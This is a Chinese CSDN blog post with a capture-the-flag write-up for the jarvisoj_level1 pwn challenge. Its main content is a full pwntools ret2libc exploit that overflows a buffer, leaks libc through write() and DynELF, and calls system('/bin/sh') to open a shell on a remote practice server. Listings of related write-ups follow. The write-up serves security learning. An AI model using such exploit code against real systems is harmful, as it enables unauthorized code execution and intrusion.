jarvisoj_level1-ret2libc

已于 2023-06-13 22:40:16 修改
阅读量85 收藏
点赞数
分类专栏: PWN 文章标签: pwn
于 2023-06-13 22:39:58 首次发布
cctrl
本文链接:https://blog.csdn.net/weixin_44309300/article/details/131197480
版权

1,
在这里插入图片描述
2,
在这里插入图片描述思路:无binsh,无system,考虑ret2libc

3,payload
利用的是pwntool模板自动搜索泄露地址匹配的libc版本

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *
from time import sleep
import sys
context.log_level="debug"
context.binary = "./level1"
elf = context.binary
context.terminal = ["deepin-terminal", "-x", "sh", "-c"]

if sys.argv[1] == "l":
    io = process("./level1")
else:
    io = remote('node4.buuoj.cn',25056)

def leak(addr):
    payload = flat(cyclic(0x88 + 4), elf.plt['write'], elf.sym['_start'], 1, addr, 4)
    io.send(payload)
    sleep(0.01)
    leaked = io.recv(4)
    info("leaked -> {}".format(leaked))
    return leaked

d = DynELF(leak, elf=ELF('./level1'))
system_addr = d.lookup('system', 'libc')
success("system -> {:#x}".format(system_addr))
pause()

#  gdb.attach(io)
payload = flat(cyclic(0x88 + 4), elf.sym['read'], elf.sym['_start'], 0, elf.bss() + 0x500, 8)
io.send(payload)
sleep(0.01)
io.send("/bin/sh\0")
sleep(0.01)

payload = flat(cyclic(0x88 + 4), system_addr, 'aaaa', elf.bss() + 0x500)
io.send(payload)

io.interactive()
hercu1iz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Jarvis OJ level1
Kni9hT's Blog
11-08 576
要点:使用shellcraft.i386()来编写shellcode 和level0相比,本题没有system函数可以直接调用。 所以我们要发送shellcode来getshell 首先看一下开了哪些保护。(好吧,不出意料是全裸) 然后IDA里面看函数调用,main()函数先调用了vulnerable_function函数。 vulnerable_function: text:0804847B ...
PWN_JarvisOJ_Level1
michaelinfinity的博客
03-13 765
首先nc一下 之后我们来看ida反编译 在“Hello,World!\n”之前有一个vulnerable_function,进去之后查看一下这个函数 可以看出来刚刚出现的奇怪的地址是buf的首地址(%p是返回参数地址的),那么我们就要查看一下buf。 从中能看出buf有0x88的字节,并且返回指令在+0004的位置,所以需要填充0x88+4的字节 这个题目中没有syste...
jarvisoj_level1
m0sway的博客
12-03 2234
jarvisoj_level1 使用checksec查看: 保护全关,并且还有RWX区域。栈溢出的题目的话直接ret2shellcode即可。 放进IDA中查看: 主函数中直接给出漏洞函数: 妥妥的一个栈溢出了,程序会输出buf的地址。 查看了下字符串也没有关键字符串,看来就是ret2shellcode 然而…BUU上的环境可能有点问题。并不能打通。 于是…使用ret2libc的方式。用write泄露libc的地址,然后捣鼓捣鼓。 exp: from pwn import * from six imp
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 143
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
Performing a ret2libc Attack-InVoLuNTaRy
04-24
ret2libc
16ret2libc1_32 pwn 入门题
02-11
pwn 入门题
Lab2-Return-To-Libc
11-10
本资料包“Lab2-Return-To-Libc”提供了相关的代码示例、实验说明以及相关论文,旨在深入探讨这一高级攻击手段。 Return-to-libc攻击是缓冲区溢出攻击的一种变种,它不依赖于执行已知的shellcode,而是利用程序...
jarvisoj-level1
qq_35661990的博客
11-08 265
先看一下有什么保护 什么保护都没开起来。 放进IDA里看一下 vulnerable_function(); write(1, "Hello, World!\n", 0xEu); return 0; main函数里就三行,进入vulnerable_function()函数看一下 char buf; // [esp+0h] [ebp-88h] printf("W...
[BUUCTF]PWN——jarvisoj_level1
BangSen1的博客
03-31 217
jarvisoj_level1 例行检查,32位,未开启任何保护。 运行一下,给了一个地址 0xffef96b0 用IDA打开,查看主函数 查看function函数。由此我们可以知道 bufadddr= 0xffef96b0, buf存在溢出漏洞。由于题目并没有开启任何保护。所以我们可以先通过read读入shellcode,然后利用溢出漏洞将ret覆盖为buf参数地址(此时buf里是shellcode)去执行即可获取shell。 ...
jarvisoj——[XMAN]level1
王嘟嘟的博客
07-15 389
题目 Wp 先查一下基本的内容 可以看到 RELRO: Partial RELRO就是got表可写的意思,然后ida接着看看源码,这里就是说调用了一个无参的函数 这里看到很明显的是一个溢出,但是这里没有shellcode,就需要自己写一个了 这里可以看到print打印了buf的地址 这里写一个pwntools的脚本 from pwn import * sh = remote("pwn2.jarvisoj.com",9877) shellcode = asm(shellcraft.i386.
jarvis oj level1
发蝴蝶和大脑斧的博客
12-01 335
还是先checksec Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 发现数据部分可以执行,先看ida,同样是vulnerable处有栈溢...
Jarvis OJ level1
九层台
07-06 760
liu@liu-F117-F:~/桌面/oj/level1$ checksec level1 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level1/level1' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: ...
Jarvis OJlevel1
weixin_43464124的博客
04-22 246
首先介绍一下pwntools的一个用法吧算是。 from pwn import* shellcraft.sh() 然后,pwntools这个只能工具就会帮你写出一串shellcode来。 大致是这样的: u" /* execve(path='/bin///sh', argv=['sh'], envp=0) */\n /* push '/bin///sh\\x00' */\n p...
(Jarvis Oj)(Pwn) level1
Nothing
04-18 1259
(Jarvis Oj)(Pwn) level1 首先用checksec查一下保护。几乎没开什么保护措施。关键的是NX没开,意味着栈上的数据可执行。 用ida反汇编,找到溢出点。 但这次没有找到system函数了,那么该怎么得到shell呢,发现这个函数调用了printf函数,输出了buf的地址,在结合NX保护是关闭的,那么就意味着,如果将shellcode写到buf中,函数返回时跳转...
Jarvis OJ pwn——level1
CNS-Enterprise BCC-1701-J
05-27 135
Jarvis OJ 做题练习
pwn ret2libc原理
最新发布
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值